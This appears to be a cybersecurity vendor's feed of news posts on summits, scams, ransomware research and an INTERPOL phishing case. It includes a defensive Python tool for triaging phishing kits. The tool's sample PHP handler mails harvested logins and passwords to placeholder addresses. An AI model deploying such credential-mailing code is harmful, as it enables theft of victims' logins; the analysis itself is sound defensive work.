What a day! The Digital Risk Summit has officially concluded with lots of online participants having joined us!
📈 During the summit we presented the findings of our research into various fraudulent schemes, obtained with the help of neural networks and the ML-based scoring of the Group-IB Digital Risk Protection system, which was built on the expertise Group-IB has gathered in over a thousand successfully solved investigations worldwide. Group-IB DRP analysts researched a multitude of fraud schemes and the damage they cause to industries worldwide.
👨💼Conference participants included the United Nations International Computing Centre (UNICC), the global market research and advisory company Forrester, and Scamadviser, an independent project.
Read our overview of the event here.
#cybersecurity #digitalrisks
The Digital Risk Protection platform 👇
🔹Identifies illegitimate use of digital assets
🔹Classifies and scores the detected violations
🔹Prioritizes and initiates appropriate takedown tactics
The solution uses advanced technologies to detect any illegitimate use of your logos, trademarks, content, and design layouts across the digital surface.
Curious to know more? Head over to our website 😉
#GISEC2021 #MEA
GISEC 2021 was a blast!
👨💻 Thank you so much to everyone who visited our stand, talked to our team, watched us on stage or simply followed our live updates on social media.
🌍 Group-IB made a noticeable contribution to this year’s edition of the largest cybersecurity showcase in the region, and with the new Dubai HQ now up and running, we are well placed to take our presence and services in the Middle East to the next level!
We hope you like our video recap and see you again soon!
YouTube
Group-IB x GISEC 2021
#books #cybersecurity
One of the most popular questions we’re getting has to be about books.
💡 Many of our followers are keen to get into digital forensics, incident response, or malware analysis, but are not sure which guide is best to get started with. Others, already professionals, are eager to take their skills to the next level.
📚 So do we have the right recommendation for everyone passionate about cybersecurity?
Most definitely! In fact, a while ago we posted a blog going through 11 books useful for both beginners and high-level professionals.
We have also added a detailed description for each one of our recommendations, so make sure to have a look ☝️
Of course this is by no means a complete list, but it’s a great start for everyone striving to expand their knowledge and skills ✨
Don’t have enough time to go through the blog? No worries - we’ve listed all 11 books below:
1. File System Forensic Analysis by Brian Carrier
2. Incident Response & Computer Forensics, Third Edition by Jason T. Luttgens, Matthew Pepe, Kevin Mandia
3. Investigating Windows Systems by Harlan Carvey
4. Digital Forensics and Incident Response, Second Edition by Gerard Johansen
5. Windows Forensics Cookbook by Oleg Skulkin and Scar de Courcier
6. The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory by Michael Hale Ligh
7. Network Forensics by Ric Messier
8. Practical Mobile Forensics: Forensically investigate and analyze iOS, Android, and Windows 10 devices, Fourth Edition by Rohit Tamma, Oleg Skulkin, Heather Mahalik, Satish Bommisetty
9. Learning Android Forensics: Analyze Android devices with the latest forensic tools and techniques, Second Edition by Oleg Skulkin, Donnie Tindall, Rohit Tamma
10. Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Windows malware by Monnappa K. A.
11. Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats by Alex Matrosov, Eugene Rodionov, Sergey Bratus
Enjoy reading 🙂
Group-IB
Digital forensics specialist's bookshelf
#digitalriskprotection #scams
Scam cases are on the rise
🕵️♀️ According to the Singapore Police Force's Annual Crime Brief 2020, there were 14,236 cases last year, including Internet love scams, impersonation scams and loan scams, with losses totalling $201.2 million. In 2019, there were 8,397 cases, with total losses of $121.8 million.
👨💻Mr Ilia Rozhnov, head of cyber-security company Group-IB's Digital Risk Protection department in the Asia-Pacific, explained that the Covid-19 pandemic has been a catalyst for the spike in the number of scams.
💬"There is the phenomenon of Scamdemic - an influx of online scams as more around the world dived online last year, when people were forced to go digital and make payments online, and use e-services," he said.
"According to Group-IB's data, last year, scams dominated the online cyber-criminal scene, totalling over 70 per cent of all online crimes."
➡️ Click here to read the full story.
Group-IB
Global Scamdemic: Scams Become Number One Online Crime
Group-IB, a global threat hunting and adversary-centric cyber intelligence company that specializes in investigating and preventing hi-tech cybercrimes, has released a comprehensive analysis of fraud schemes on a global scale. In total, fraud accounts for…
#blog #ransomware
REvil Twins: Deep Dive into Prolific RaaS Affiliates' TTPs
🔹Ransomware continues to dominate the cybercriminal scene in 2021. The number of attacks as well as the ransom demands seem to be growing quickly. According to the Ransomware Uncovered 2020-2021 report, the Ransomware-as-a-Service model, in which developers sell or lease malware to program affiliates for network compromise and ransomware deployment, became one of the major driving forces behind the phenomenal growth of the ransomware market.
🔹The Group-IB DFIR team observed that 64% of all ransomware attacks it analyzed in 2020 came from operators using the RaaS model.
🔹In our new blog post by Oleg Skulkin, Senior Digital Forensics analyst at Group-IB, we focus on one of the most active ransomware collectives, REvil, and their RaaS program, which attracts more and more affiliates due to the shutdown of other RaaS programs.
🔹Our experts took a deep dive into the modus operandi of REvil affiliates and shared information on the various affiliates' tactics, techniques and procedures observed, so defenders can tune their detection capabilities accordingly.
🔹Make sure to save the detection tips and the REvil affiliates’ TTPs mapped to MITRE ATT&CK by the Group-IB DFIR team.
➡️ Click here to read the blog now.
Group-IB
Ransomware Uncovered 2020/2021 | Group-IB Research
The complete guide to the latest tactics, techniques, and procedures of ransomware operators based on MITRE ATT&CK®
#ransomware #groupib #reverseengineering #Ryuk #GrimAgent
Group-IB Threat Intelligence team reverse engineered the Grim Agent backdoor used in Ryuk ransomware operations for the very first time
Our latest blog comes with all the details, including Yara and Suricata rules.
Ransomware activity increased drastically over the past couple of years and became the face of cybercrime by 2021.
📄 According to the Ransomware Uncovered 2020-2021 report, the number of ransomware attacks increased by more than 150% in 2020. The attacks grew in not only number but also scale and sophistication — the average ransom demand increased by more than twofold and amounted to $170,000 in 2020.
👥 Gangs are constantly evolving. The past year saw ransomware operators change their tactics, defense evasion techniques, and procedures to ensure that their illicit business thrives. Given that ransomware attacks are conducted by humans, understanding the modus operandi and toolset used by attackers is essential for companies that want to avoid costly downtimes. Ultimately, knowing how ransomware gangs operate and being able to thwart their attacks is more cost-effective than paying ransoms.
🔹 One of the underlying trends of 2021 to keep in mind is the use of commodity malware. The infamous ransomware gang Ryuk, which is responsible for many high-profile cyber heists, followed suit. The most recent addition to their arsenal, which is yet to be explored, is the malware called GrimAgent.
💡Our new blog features the first comprehensive analysis of the GrimAgent backdoor. It is intended mainly for reverse engineers, researchers and blue teams so that they can create and implement rules that help monitor this cyber threat closely.
💪The blog also provides a great illustration of our team in action.
➡️ Click here to check it out.
Group-IB
The Brothers Grim
The reversing tale of GrimAgent malware used by Ryuk
#mssp #gib_thf
Group-IB has signed a partnership agreement with CyberSec Services, a Managed Security Services Provider with offices in Milan and Ticino 🇮🇹🇨🇭
🤝 CyberSec Services becomes the first partner in Europe who joined Group-IB’s MSSP & MDR program.
⏫ Thanks to the partnership, Italian and Swiss companies can now take advantage of Group-IB’s Threat Hunting Framework - the first single multi-tenant solution to identify and attribute cyber criminals and to detect, hunt, and respond to the most sophisticated threats in both IT and OT networks.
💬 Alessandro Aresi, CEO of CyberSec Services, comments: “We have identified Group-IB as the ideal partner for a service offering which covers the most different needs of our customers. The peculiarity of Group-IB is the completeness of their solutions and the ability to make their portfolio compatible and complementary to an MSSP such as CyberSec Services.
One of the most interesting aspects for us, besides the consolidated experience in the field of Cyber Threat Intelligence and Investigation, is the ability to let converge the more traditional world of IT with the world of OT. This aspect allowed us for example to serve at best one of our most relevant customers, who wanted to source out full protection of their power plants and of the entire IT infrastructure from one single hand, with considerable savings in time and costs”.
Group-IB
MSSP and MDR Partner Program
Group-IB wants to take security services to the next level with its MSSP / MDR Partner Program which combines full visibility of real threats and a rapid response to them in a single solution.
#interpol #phishing #fraud #carding
Group-IB has supported INTERPOL in its Lyrebird operation that resulted in the identification and apprehension of a threat actor presumably responsible for multiple attacks worldwide.
👥 According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr HeX by Group-IB based on one of the nicknames that he used, has been active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.
⚔️ The alleged perpetrator, who turned out to be a citizen of Morocco, was arrested in May by the Moroccan police based on the data about his cybercrimes that was provided by Group-IB.
🧑💻 The starting point of Group-IB’s research to identify and deanonymize the cybercriminal was the extraction of a phishing kit (a tool used to create phishing web pages) exploiting the brand of a large French bank by Group-IB’s Threat Intelligence & Attribution system.
🔁 The detected phishing kit was set up in a common way: a spoofed website of the targeted company was created, emails impersonating the company were mass-distributed asking users to enter their login information on the spoofed site, and the credentials left by unsuspecting victims on the fake page were forwarded to the perpetrator’s email. Almost every script in the phishing kit carried its creator’s nickname, Dr HeX, and contact email address.
➡️ Curious to learn the details? Click here to read the full story!
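The post describes how a captured phishing kit gave away its operator: credentials from the fake page were mailed to the perpetrator's address, and the kit's scripts carried his nickname and contact email. The following is an added example (not Group-IB's code) of how a defender can triage a captured kit's sources for exactly those indicators: drop addresses used as mail() recipients, signature comments, the post-submit redirect, and the form fields being harvested. The kit files, handle and addresses below are constructed for the example.

```python
"""Triage a captured phishing kit for attribution and blocking indicators."""
import re
from collections import defaultdict

# Constructed sample imitating the structure described above: a fake login
# page that POSTs to a handler which mails the credentials out. The handle,
# addresses and domains are invented; none refer to a real kit or person.
SAMPLE_KIT = {
    "login.php": """<?php
/* kit by DrX_example - contact: drx@example.invalid */
?>
<form method="post" action="send.php">
<input name="user"><input name="pass"></form>""",
    "send.php": """<?php
// DrX_example
$to = "drx@example.invalid";
$cc = "backup.drx@example.invalid";
$msg = "user: ".$_POST['user']." pass: ".$_POST['pass']." ip: ".$_SERVER['REMOTE_ADDR'];
mail($to, "new login", $msg);
mail($cc, "new login", $msg);
header("Location: https://bank.example.invalid/login");
""",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Comments at line start only, so "https://" inside a string is not mistaken for one.
COMMENT_RE = re.compile(r"(?m)^\s*(?://|#|/\*)\s*([^\n*]+)")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(\s*(\$\w+|\"[^\"]+\"|'[^']+')")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*[\"']([^\"']+)[\"']")
HEADER_RE = re.compile(r"header\s*\(\s*[\"']Location:\s*([^\"']+)[\"']")
POST_FIELD_RE = re.compile(r"\$_POST\[['\"](\w+)['\"]\]")


def analyze_kit(files):
    """Return attribution and blocking indicators found in a kit's sources.
    files: mapping of file name -> PHP/HTML source text."""
    report = {
        "emails": defaultdict(set),   # every address seen -> files it appears in
        "drop_emails": set(),         # addresses that receive the stolen credentials
        "handles": set(),             # signature-like comments (candidate nicknames)
        "redirects": set(),           # where the victim is sent after submitting
        "harvested_fields": set(),    # form fields the kit exfiltrates
    }
    for name, src in files.items():
        for addr in EMAIL_RE.findall(src):
            report["emails"][addr].add(name)
        # mail()'s first argument is either a literal or a variable assigned one;
        # resolve simple single-file assignments so $to becomes the real address.
        assigns = dict(ASSIGN_RE.findall(src))
        for arg in MAIL_CALL_RE.findall(src):
            target = assigns.get(arg, arg.strip("\"'"))
            if EMAIL_RE.fullmatch(target):
                report["drop_emails"].add(target)
        for text in COMMENT_RE.findall(src):
            text = text.strip()
            # Keep comments that contain an address or look like a bare handle.
            if EMAIL_RE.search(text) or re.fullmatch(r"[\w.-]+", text):
                report["handles"].add(text)
        report["redirects"].update(HEADER_RE.findall(src))
        report["harvested_fields"].update(POST_FIELD_RE.findall(src))
    report["emails"] = {k: sorted(v) for k, v in report["emails"].items()}
    return report


if __name__ == "__main__":
    for key, value in analyze_kit(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```

The drop addresses and redirect target are the values worth feeding into mail-flow blocking and takedown requests; the handles are pivots for further attribution work.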
Group-IB
Operation Lyrebird: Group-IB assists INTERPOL in identifying suspect behind numerous cybercrimes worldwide
Group-IB has supported INTERPOL in its Lyrebird operation that resulted in the identification and apprehension of a threat actor.
#gib_thf #marketplace
Group-IB joins Palo Alto Networks Cortex XSOAR Marketplace
⭐️ Our Threat Hunting Framework Polygon, a Malware Detonation & Research platform, is now available on the Palo Alto Networks Cortex XSOAR Marketplace, the industry’s largest and most comprehensive security orchestration marketplace. The content pack from Group-IB on Cortex XSOAR’s Marketplace provides customers with a tool that guarantees malware detonation and behavioral analysis, and was developed by engineers with long-standing experience in investigating cybercrimes worldwide, and participating in global operations with international law enforcement, incident response, and cyberattack monitoring and attribution.
🔁 Group-IB’s THF Polygon is an integral part of the company’s ecosystem of high-powered and innovative solutions for protection against previously unknown threats and targeted attacks along with investigating and responding to cybercrimes to minimize potential consequences. Be sure to have a look at the comprehensive overview to learn more.
💬 “A robust, open ecosystem is at the heart of Cortex XSOAR,” said Rishi Bhargava, VP of Product Strategy for Cortex XSOAR at Palo Alto Networks. “We are proud to welcome Group-IB to the Cortex XSOAR Marketplace ecosystem, which has 700+ integrations that enable our customers to connect disparate security tools and data sources to enable maximum efficiency in the SOC.”